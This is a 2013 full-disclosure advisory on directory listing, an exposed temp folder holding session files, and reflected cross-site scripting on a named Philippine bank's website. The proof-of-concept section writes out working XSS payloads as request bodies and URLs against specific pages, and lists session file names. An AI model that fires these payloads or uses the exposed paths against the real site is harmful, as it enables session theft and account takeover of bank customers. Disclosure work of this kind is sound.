FICOBank Information Disclosure / Cross Site Scripting

`FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable  
  
  
Report-Timeline:  
================  
  
23-08-2013 Advisory  
  
Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us.  
Thank you very much"  
  
( /ME I don´t understand this response.. Is it a joke? )  
  
20-08-2013 Full Disclosure  
  
  
I-VULNERABILITY  
-------------------------  
  
#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable  
  
#Vendor:http://www.ficobank.com / http://ficobank.com  
  
#Author:Juan Carlos García (@secnight)  
  
#Follow me   
  
http://www.highsec.es  
Twitter:@secnight  
  
  
  
II-Introduction:  
=============  
  
The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.  
Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons,   
which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural  
bank that it opted to be, it elevated to a mountain-high cooperative bank,   
as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).  
  
-------------------------  
  
III-PROOF OF CONCEPT  
====================  
  
Attack details  
--------------  
  
Directory Listing  
*****************  
  
The web server is configured to display the list of files contained in this directory.  
This is not recommended because the directory may contain files that are not normally   
exposed through links on the web site.A user can view a list of all files from this   
directory possibly exposing sensitive information.  
  
Affected items  
  
http://ficobank.com/annualreport/  
  
/annualreport   
/annualreport/_notes   
/annualreport/annualreport   
/Assets4Sale   
/Assets4Sale/a4sale   
/Assets4Sale/a4sale/_notes   
/contact   
/contact/_notes   
/contact/html-contact-form-captcha   
/contact/html-contact-form-captcha/_notes   
/contact/html-contact-form-captcha/scripts   
/contact/html-contact-form-captcha/scripts/_notes   
/contact/scripts   
/contact/scripts/_notes   
/contact/scripts-old   
/contact/scripts-old/_notes   
/DepositProducts   
/DepositProducts/_notes   
/Ficonnect   
/flash   
/flash/_notes   
/images   
/images/awards   
/images/images   
/images/jobopening   
/images/jobopening/_notes   
/images/officer   
/images/signature   
/images/signature/_notes   
/images/slides   
/Leadership   
/LoanProducts   
/news   
/news/_notes   
/OtherServices   
/OtherServices/_notes   
/scripts   
/scripts/_notes   
/Stylesheet   
/Stylesheet/_notes   
  
Temporary file/directory  
  
Affected items  
  
http://www.ficobank.com/tmp/  
  
/tmp   
/tmp/mailError.log   
/tmp/sess_secnightsessionfixation   
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594   
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c   
/tmp/untitled  
  
File Lock  
  
These lock files often contain usernames of the user that  
has locked the file. Username harvesting can be done using this technique...  
  
  
http://www.ficobank.com/DepositProducts/  
  
Cross Site Scripting  
****************  
  
Cross site scripting (also referred to as XSS) is a vulnerability that allows   
an attacker to send malicious code (usually in the form of Javascript) to another user.  
Because a browser cannot know if the script should be trusted or not, it will execute   
the script in the user context allowing the attacker to access any cookies or session tokens  
retained by the browser.   
  
  
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into  
a vulnerable application to fool a user in order to gather data from them.An attacker can steal the  
session cookie and take over the account,impersonating the user.It is also possible to modify the content  
of the page presented to the user.   
  
  
Affected items  
  
/contact/contactus.php   
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='  
The input is reflected inside a tag parameter between single quotes.  
  
  
Variant email(2)  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit  
  
  
  
Variant Name  
  
URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='  
The input is reflected inside a tag parameter between single quotes.  
  
POST /contact/contactus.php   
  
6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit  
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit  
  
  
/contact/email.php   
  
URI was set to #" onmouseover=prompt(919235) //  
The input is reflected inside a tag parameter between double quotes.  
  
GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//  
  
  
/contact/email.php.bak   
  
URI was set to #" onmouseover=prompt(994575) //  
  
GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//   
  
  
/contact/email.php.BAK  
  
URI was set to #" onmouseover=prompt(924567) //  
  
The input is reflected inside a tag parameter between double quotes.  
  
  
GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//  
  
  
/contact/html-contact-form-captcha/html-contact-form.php (4)  
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='  
  
POST /contact/html-contact-form-captcha/html-contact-form.php  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit  
  
  
/contact/samplexyz.php (7)  
  
URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="  
  
POST /contact/samplexyz.php  
  
contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1  
  
Variants contactname,email,subject  
  
  
/contact/samplexyz.php.bak   
  
URI was set to #" onmouseover=prompt(959358) //  
The input is reflected inside a tag parameter between double quotes.  
  
GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//   
  
  
/contact/samplexyz.php.BAK  
  
URI was set to #" onmouseover=prompt(966989) //  
  
GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//  
  
  
/contactus.php(4)  
  
Variant email, name  
  
email(3)  
  
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='  
  
  
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit  
  
name(1)  
  
URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='  
  
6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit  
  
  
Jquery Old Version Vulnerable  
***************************  
  
jQuery JavaScript Library v1.4.2  
  
This problem was fixed in jQuery 1.6.3.  
  
This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability.  
Many sites are using to select elements using location.hash that allows someone to inject   
script into the page.  
  
$("#id") is css selector, $("<img>") is createElement, and $("#<img>") is createElement too.  
  
  
Affected items  
  
/OtherServices/fade.min.js   
  
  
GET /OtherServices/fade.min.js   
  
Response:  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:45 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml",  
CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"  
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
  
  
/OtherServices/jquery.fade.js   
  
  
GET /OtherServices/jquery.fade.js   
jquery_xss/#<img src=/ onerror=alert(1)>  
  
Response  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:46 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"  
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
Content-Length: 72174  
  
  
/scripts/fade.min.js   
  
  
GET /scripts/fade.min.js   
  
Response  
  
HTTP/1.1 200 OK  
Date: Fri, 23 Aug 2013 15:48:46 GMT  
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"  
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT  
Accept-Ranges: bytes  
Content-Type: application/x-javascript  
Age: 0  
Connection: keep-alive  
Server: YTS/1.20.28  
Content-Length: 72174  
  
  
/scripts/jquery.fade.js   
  
  
GET scripts/jquery.fade.js   
  
Response  
  
The same..  
  
  
IV. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
by Juan Carlos García(@secnight)  
  
Special Thanks: Perseo  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`